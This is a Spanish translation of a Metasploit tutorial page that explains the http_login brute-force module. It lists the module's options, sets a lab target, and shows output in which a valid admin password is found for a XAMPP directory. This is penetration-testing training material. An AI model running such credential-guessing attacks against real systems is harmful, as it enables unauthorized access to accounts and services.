Http/http login

De www.metasploit-es.com.ar

El modulo "http_login" es un escaneador de login por fuerza bruta que intenta autenticarse en un sistema utilizando autenticacion HTTP. 

msf > use auxiliary/scanner/http/http_login
msf auxiliary(http_login) > show options

Module options (auxiliary/scanner/http/http_login):

   Name              Current Setting                                                 Required  Description
   ----              ---------------                                                 --------  -----------
   AUTH_URI                                                                          no        The URI to authenticate against (default:auto)
   BLANK_PASSWORDS   true                                                            yes       Try blank passwords for all users
   BRUTEFORCE_SPEED  5                                                               yes       How fast to bruteforce, from 0 to 5
   PASSWORD                                                                          no        A specific password to authenticate with
   PASS_FILE         /opt/metasploit3/msf3/data/wordlists/http_default_pass.txt      no        File containing passwords, one per line
   Proxies                                                                           no        Use a proxy chain
   RHOSTS                                                                            yes       The target address range or CIDR identifier
   RPORT             80                                                              yes       The target port
   STOP_ON_SUCCESS   false                                                           yes       Stop guessing when a credential works for a host
   THREADS           1                                                               yes       The number of concurrent threads
   USERNAME                                                                          no        A specific username to authenticate as
   USERPASS_FILE     /opt/metasploit3/msf3/data/wordlists/http_default_userpass.txt  no        File containing users and passwords separated by space, one pair per line
   USER_FILE         /opt/metasploit3/msf3/data/wordlists/http_default_users.txt     no        File containing users, one per line
   UserAgent         Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)              yes       The HTTP User-Agent sent in the request
   VERBOSE           true                                                            yes       Whether to print output for all attempts
   VHOST                                                                             no        HTTP server virtual host

Para configurar el modulo, definimos el parametro AUTH_URI con la ruta de la pagina que solicita autenticacion, nuestro valor RHOSTS y, para reducir la salida, definimos el valor VERBOSE a false. 

msf auxiliary(http_login) > set AUTH_URI /xampp/
AUTH_URI => /xampp/
msf auxiliary(http_login) > set RHOSTS 192.168.1.201
RHOSTS => 192.168.1.201
msf auxiliary(http_login) > set VERBOSE false
VERBOSE => false
msf auxiliary(http_login) > run

[*] Attempting to login to http://192.168.1.201:80/xampp/ with Basic authentication
[+] http://192.168.1.201:80/xampp/ - Successful login 'admin' : 's3cr3t'
[*] http://192.168.1.201:80/xampp/ - Random usernames are not allowed.
[*] http://192.168.1.201:80/xampp/ - Random passwords are not allowed.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(http_login) >

Como vemos en la salida de arriba, nuestro escaneo ha encontrado un conjunto valido de credenciales para el directorio.

© Offensive Security 2009 

Original de www.offensive-security.com
Traducido por cbk999
Obtenido de «http://www.metasploit-es.com.ar/wiki/index.php/Http/http_login»
Herramientas personales